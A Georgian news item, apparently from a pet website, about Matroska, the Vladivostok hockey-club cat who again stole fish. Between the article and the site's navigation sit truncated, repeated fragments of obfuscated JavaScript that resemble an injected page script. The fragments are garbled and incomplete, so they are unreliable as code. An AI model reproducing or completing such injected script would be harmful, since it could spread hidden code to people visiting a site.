კატა მატროსკა ვლადივოსტოკიდან რეციდივისტი გახდა (+ვიდეო)
კატა მატროსკა ვლადივოსტოკიდან რეციდივისტი გახდა (+ვიდეო)
კატა მატროსკამ, რომელმაც 2014 წელს სახელი გაითქვა ზღვის პროდუქტების მაღაზიაზე თავდასხმით, კვლავ მოიპარა თევზი. ამჯერად ცხოველმა ჰოკეის კლუბი “ადმირალი” დააზარალა, რომლის ოფისიდან კატამ მოიპარა თევზი.

“თევზი კატას მაშინვე ჩამოვართვით. მატროსკა სწორად იკვებება, ამიტომ ასეთი საჭმელი მისთვის არ შეიძლება”, - ყვება სპორტული ორგანიზაციის წევრი სტანისლავ ლუცენკო.

ოფისიდან თევზის მოპარვის ვიდეო მატროსკის ინსტაგრამზე დაიდო. “კვლავ ფორმაში ვარ”, - წერია ვიდეორგოლის კომენტარში.

21 იანვარს ვეტერინარებმა კატა სპეციალურ დიეტაზე გადაიყვანეს. ზოომედიკოსების თქმით, ცხოველს თირკმელების პრობლემა აღმოაჩნდა.

2014 წელს კატა გუნდი “ადმირალის” თილისმა გახდა. სპორტსმენებმა კატა
შეიფარეს “ფეტისოვის არენაზე” , სადაც ჰოკეის კლუბი თავის მატჩებს მართავს.

კატა, რომელსაც “ადმირალში” მატროსკა დაარქვეს,
ინტერნეტსამყარომ 2014 წელს გაიცნო, როდესაც ის ვლადივოსტოკის აეროპორტის მაღზიაში “თევზის კუნძული” შეიპარა და 63 000 მანეთის ღირებულების პროდუქცია შეჭამა, თუ გააფუჭა.

იხილეთ ვიდეო

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o {var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o
კომენტარი ჯერ არ გაკეთებულა
დახმარება
  • რა ვაჭამოთ?
  • ჯიშები
  • სად ვიყიდოთ?
გამოკითხვა
რომელი ბრენდის საკვებს აჭმევთ თქვენს ძაღლს?